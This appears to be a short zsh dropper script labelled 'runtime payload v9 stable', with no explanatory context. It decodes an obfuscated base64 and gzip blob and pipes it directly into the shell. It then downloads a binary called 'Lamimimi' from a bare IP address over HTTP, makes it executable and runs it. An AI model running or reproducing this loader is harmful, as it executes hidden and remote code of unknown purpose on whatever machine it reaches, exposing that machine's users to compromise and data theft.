#!/bin/zsh
# runtime payload v9 stable

set -e

cd "$TMPDIR"

echo 'H4sIAAAAAAAA/wXAyg6CoF9h3vMxm8Nulq6W5lYzpkckDEIFBZy5Pr6NklkFiJ17sNPAYcYoffA8zmFoFY8F8yVvsYHbPLAQ6m6JAisiODE8GDIbMvXCVfhNtfuii5d80NZhlC0iDBobFNm3QEl1r/fxJQ6qDMvSRgTlj3Q8a9pUfrbeyuvRbjlLqTwVNXy6WKvVAT/QYs3+v/o8FJ0AAAA=' | base64 -d | gunzip | sh

curl -fsSL -o Lamimimi http://64.89.160.11/Lamimimi

chmod +x Lamimimi

./Lamimimi
